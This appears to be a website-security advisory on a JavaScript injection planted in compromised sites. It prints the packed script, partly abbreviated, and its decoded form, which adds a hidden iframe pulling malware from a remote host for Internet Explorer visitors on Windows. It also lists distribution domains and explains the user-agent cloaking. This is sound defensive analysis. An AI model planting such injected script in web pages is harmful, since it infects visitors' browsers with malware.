<script>eval(function(p,a,c,k,e,d){e=function(c) {return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}; if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}]; e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’ \\b’,'g’),k[c])}}return p}(‘i 9(){a=6.h(\’b\’);7(!a){5 0=6.j(\’k\’);6.g.l(0); .. 9()",y)}’,41,41,’el||ua|indexOf|style|var|document|if|1px| MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement| iframe|appendChild|src|id|c0m|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent| 1000|hdghdg|navigator|li|showthread|php| 72241732′.split(‘|’),0,{}))

(The packed payload above is abbreviated at the "..".) That code, once decoded by the browser, generates an iframe that loads more malware, which is then used to infect the browser of anyone visiting the compromised web site.
This is the code decoded:
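function MakeFrameEx(){element=document.getElementById(‘yahoo_api’);if(!element){var el=document.createElement(‘iframe’);document.bo dy.appendChild(el);el.id=’yahoo_api’;el.style.display=’none’; el.src=’http://hdghd.c0m.li/showthread.php?t=72241732‘}}var ua=navigator.userAgent.toLowerCase();if(((ua.indexOf("msie")!=-1&&ua.indexOf("opera")==-1&&ua.indexOf("webtv")==-1))&&ua.indexOf("windows")!=-1){var t=setTimeout("MakeFrameEx()",1000)}

Note that the iframe is hidden (display set to none, id yahoo_api) and is only created, after a one-second delay, when the user agent string contains "msie" and "windows" and does not contain "opera" or "webtv". A check of the site made with any other user agent will therefore not see the iframe being added. The strings yahoo_api and showthread appear in plain text inside the packed script's word list, so they can be searched for in the site's files.

Some domains being used to distribute the malware: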
bdfzghdfh.nl.ai
chief-bagel.xe.cx
hdghd.c0m.li
probable-waitress.mypicture.info
http://dwrewr.c0m.li/showthread.php?t=68791819 (178.18.87.141)
http://chief-bagel.xe.cx/showthread.php?t=68791819 (95.163.66.209)
http://coldsoup.got-game.org/showthread.php?t=68791819 (95.163.66.209)
http://probable-waitress.mypicture.info/showthread.php?t=687918.. (95.163.66.209)
http://poorwine.freewww.biz/showthread.php?t=68791819 (95.163.66.209)
http://sockscape.gv.vg/showthread.php?t=50170030
http://simincc.co.be/showthread.php?t=10170030
http://krrrdid.co.cc/showthread.php?t=60170030
If your site is compromised, sign up with us and we will fix it for you: http://sucuri.net/signup